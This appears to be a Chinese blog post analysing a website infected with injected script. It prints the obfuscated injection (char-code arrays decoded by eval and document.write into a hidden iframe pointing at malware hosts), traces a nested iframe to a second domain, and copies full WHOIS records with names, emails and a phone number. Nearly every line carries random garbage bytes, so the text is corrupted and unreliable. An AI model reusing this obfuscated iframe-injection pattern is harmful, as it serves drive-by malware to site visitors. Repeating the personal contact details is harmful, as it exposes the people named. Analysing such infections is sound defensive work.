首发在我的博客里面,
d�
o�Eu�KT DBaZ�cO(U http://www.areway.cn/?p=175 M6�Xzyt��| 6QT&{|q��= }f�f^��^7_ 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
>�jmH�e^rH J%r:"Jm[y1 <script>t=’60,105,102,114,97,109,101,
mejNa(D� ^ 32,115,114,99,61,104,116,116,112,58,47,47,
~�4Fz��A,, 102,114,101,101,46,117,45,117,117,117,46,99,
w����L:7G� 110,47,101,114,114,111,114,46,104,116,109,
g��|�3�bM� 32,119,105,100,116,104,61,49,48,48,32,104,
sxR�K�WM@4 101,105,103,104,116,61,48,62,60,47,105,102,
GJQ>VI2c�Y 114,97,109,101,62′;
�"?��a���I t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
4�\|Q�;�@f d(V4�;8�a0 <script>t=’60,105,102,114,97,109,101,32,115,
�Bnk<����e 114,99,61,104,116,116,112,58,47,47,102,114,
<Rn-B).3bs 101,101,46,117,45,117,117,117,46,99,110,47,
V0
��Z8VqV 101,114,114,111,114,46,104,116,109,32,119,
(j@c946z"" 105,100,116,104,61,49,48,48,32,104,101,105,
�Z��+�6W�G 103,104,116,61,48,62,60,47,105,102,114,97,
O9?.J,,mVh 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
)hQ]>�o@i{ document.write(t);</script>
#*y.C[^5{ 7� q�n=��W <html xmlns=”
�Z]DZ�:d�F http://www.w3.org/1999/xhtml vuY� �X�0& “>
McS]aJ�frk <head>
ZD|F"���v. <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
H$�WD7/?j <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
0n�2�H7}Uq <title>首页 - 爱生活家庭网
Gukvd6-g9b �S�rmr�`[i 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
'��,]Aj!�q 转换字符串后的大概内容是(谁点击后果自付):
L'KK�U4z�j <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
Qt>ky�t�hi �0$�-|Th:o 查询玉米u-uuu.cn的详细信息:
z����x]r.V Domain Name: u-uuu.cn
9a]o?�>`E� ROID: 20070901s10001s64972306-cn
,aS+��RJNM Domain Status: ok
{4/*2IRN9h Registrant Organization: 王雷
?#&[1.= u� Registrant Name: 王雷
(vD=�=n9Hd Administrative Email:
czlovexs@126.com �\��P":��V Sponsoring Registrar: 北京万网志成科技有限公司
`\��"<%CCe Name Server:ns.yovole.com
*}#HBZe�(9 Name Server:ns1.yovole.com
[!3cW�JCt� Registration Date: 2007-09-01 17:54
)jUP���MIo Expiration Date: 2008-09-01 17:54
[���ypE[ � 最后PING了一下地址 都没有什么….
�*$R9'Yo}F c1FSQ
m81� 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
\�zk�>�cQ� <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
F{Yr8(UHA <script language=”javascript” src=”
��9-�_Lc<� http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script 8|\ -(:v >
b~�*�iL�!< 这个玉米应该有可能是木马作者的:
$�`\qY ^.( foafau.info的详细信息:
:a�2��[d1 Access to INFO WHOIS information is provided to assist persons in
��G~u�$BV' determining the contents of a domain name registration record in the
n���r�&|�� Afilias registry database. The data in this record is provided by
��wexX|B^u Afilias Limited for informational purposes only, and Afilias does not
�[�Rq|;�p� guarantee its accuracy. This service is intended only for query-based
�II _�CT=� access. You agree that you will use this data only for lawful purposes
XA��>u�CJf and that, under no circumstances will you use this data to: (a) allow,
X�I�$�W�� enable, or otherwise support the transmission by e-mail, telephone, or
*����Od?>z facsimile of mass unsolicited, commercial advertising or solicitations
f9��X��a}* to entities other than the data recipient’s own existing customers; or
[X�]hb7-&
(b) enable high volume, automated, electronic processes that send
wxJ��"{�(; queries or data to the systems of Registry Operator, a Registrar, or
[hH>BE�t�m Afilias except as reasonably necessary to register domain names or
$gYGnh_,Q� modify existing registrations. All rights reserved. Afilias reserves
kxyO�e[7 S the right to modify these terms at any time. By submitting this query,
8q�6�Le�{G you agree to abide by this policy.
bx��L'k/Y$ Domain ID:D22418703-LRMS
�q^^R��|X1 Domain Name:FOAFAU.INFO
m�;xa}b{(i Created On:20-Nov-2007 16:05:42 UTC
v)��|a}5={ Last Updated On:20-Nov-2007 16:05:44 UTC
%q��eNC\6N Expiration Date:20-Nov-2008 16:05:42 UTC
@C[�p?��ak Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
�k�^;��/@: Status:CLIENT DELETE PROHIBITED
jZmL�7
�V� Status:CLIENT RENEW PROHIBITED
e&Z�H� 1^O Status:CLIENT TRANSFER PROHIBITED
n.NW�S/v_{ Status:CLIENT UPDATE PROHIBITED
�r7�}KV| M Status:TRANSFER PROHIBITED
$�}S0LZ_H Registrant ID:GODA-040110615
�Yg��&/�^� Registrant Name:liu hong
2�{�l|<'�� Registrant Organization:
Ny`SE\B+/� Registrant Street1:beijing
@�J�6r;4|& Registrant Street2:
z.)*/HG�Jm Registrant Street3:
&��Y9%Y/�Y Registrant City:beijing
%�1GK��N|7 Registrant State/Province:
`<�T�4��En Registrant Postal Code:100000
doX�`NbA� Registrant Country:CN
�%$)S��z[= Registrant Phone:+86.860108888777
LB$0'�dZU Registrant Phone Ext.:
zZ51jA�9x Registrant FAX:
qJl D�Qc-� Registrant FAX Ext.:
zd$iD�i(�$ Registrant Email:bbbshiji@163.com
In:V.'D/>t Admin ID:GODA-240110615
{`)o��x�zR Admin Name:liu hong
�L:@CO�y�� Admin Organization:
&�jg>X+;�� Admin Street1:beijing
�n++���ak\ Admin Street2:
$JBb]�
v8_ Admin Street3:
b"��td]H3h Admin City:beijing
pV���:��44 Admin State/Province:
4Xi�Q8��"C Admin Postal Code:100000
��%Y�#W#G Admin Country:CN
`R�U���RC" Admin Phone:+86.860108888777
&E!m�(|6?+ Admin Phone Ext.:
?/,V{!UTtq Admin FAX:
<��pG 4�g� Admin FAX Ext.:
L9,��GUtK{ Admin Email:bbbshiji@163.com
�?/@XJcm�+ Billing ID:GODA-340110615
Lq��6nmjL� Billing Name:liu hong
~S�A���>�$ Billing Organization:
&�"C�y&��[ Billing Street1:beijing
I�'n}6D�.M Billing Street2:
U_�Mag�(^- Billing Street3:
vGJw/ij'X� Billing City:beijing
vt(��}�8C+ Billing State/Province:
XS&;�8 P�O Billing Postal Code:100000
u!�It'�;j� Billing Country:CN
S�c}�R�s�� Billing Phone:+86.860108888777
x|^p9�m"=% Billing Phone Ext.:
`�8\"�3��S Billing FAX:
)N�3�/;�U; Billing FAX Ext.:
`@6y W�b:X Billing Email:bbbshiji@163.com
ZN'B�@E=p� Tech ID:GODA-140110615
fcohYo�5mh Tech Name:liu hong
KNP^k$=)3c Tech Organization:
[;D1O;c'W. Tech Street1:beijing
�W_/$H_04+ Tech Street2:
hQ�L@q7tUr Tech Street3:
�YF;2jl Nm Tech City:beijing
�4@n�y�%_/ Tech State/Province:
?e+y7K�}"] Tech Postal Code:100000
�[V;u7Z\r- Tech Country:CN
�=&.9z 4�A Tech Phone:+86.860108888777
Pu���BE=9, Tech Phone Ext.:
u-.nR}�DM_ Tech FAX:
].Q���zOV' Tech FAX Ext.:
g�*4^HbVxt Tech Email:bbbshiji@163.com
_Ix�Ynm`pc Name Server:NS27.DOMAINCONTROL.COM
awQB0ow'$P Name Server:NS28.DOMAINCONTROL.COM
ose)��\rM' Name Server:
~� `�{{�Z& Name Server:
{��=�3'H?$ Name Server:
!{�g>g%2!� Name Server:
=XS�upM�[T Name Server:
4�Vst��tT� Name Server:
'XY�jo&��w Name Server:
=��gd~r�k9 Name Server:
�k%�N$�eO$ Name Server:
�*�J4�\K�U Name Server:
Z{�F^�qwne Name Server:
1�^WkW\9kO LiGECqWBa' 接着下载每个文件里面的代码:
(J��(Sw�L| 一步一步看..
YXU2UI�Y<~ 
�]yFO~�4Nu 
}^od�UIj�� 
�^�Vc(oa&; 
�/��k�O%aN 
RW��Jyd�=� 都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试
